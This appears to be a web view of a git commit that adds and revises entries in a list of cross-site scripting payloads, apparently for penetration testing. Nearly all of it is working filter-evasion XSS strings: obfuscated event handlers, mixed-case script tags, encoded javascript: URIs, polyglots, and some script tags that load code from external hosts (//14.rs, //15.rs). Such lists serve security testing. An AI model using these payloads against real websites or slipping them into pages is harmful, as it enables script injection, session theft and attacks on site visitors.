Merge pull request #237 from s0md3v/patch-1

+5 payloads, some enhancements
This commit is contained in:
g0tmi1k 2019-01-08 18:11:33 +00:00 committed by GitHub
commit 7ed3f897df
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,17 +1,22 @@
<svg%0Aonload=%09((pro\u006dpt))()// <svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x> <sCriPt x>(((confirm)))``</scRipt x>
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z <w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z
<details open ontoggle=confirm()> <deTAiLs/open/oNtoGGle=confirm()>
<script y="><">/*<script* */prompt()</script <scRiPt y="><">/*<sCRipt* */prompt()</script
<a href="javascript%26colon;alert(1)">click <A href="javascript%26colon;confirm()">click
<svg onload=write()> <sVg oNloaD=write()>
<a href=javas&#99;ript:alert(1)>click <A href=javas%26#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)> <sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()// <svG/x=">"/oNloaD=confirm()//
<--`<img/src=` onerror=confirm``> --!> <--`<iMG/srC=` onerror=confirm``> --!>
<svg </onload ="1> (_=prompt,_(1)) ""> <SVg </onlOad ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs> <!--><scRipT src=//14.rs>
<script x=">" src=//15.rs></script> <sCriPt/src=//14.rs?
<sCRIpt x=">" src=//15.rs></script>
<D3/OnMouSEenTer=[2].find(confirm)>z
<D3"<"/OncLick="1>[confirm``]"<">z
<D3/OnpOinTeReENer=confirm``>click here
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<x oncut=alert()>x <Z oncut=alert()>x
<iframe/src \/\/onload = prompt(1) <iFrAMe/src \/\/onload = prompt(1)
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

Before

Width:  |  Height:  |  Size: 643 B

After

Width:  |  Height:  |  Size: 828 B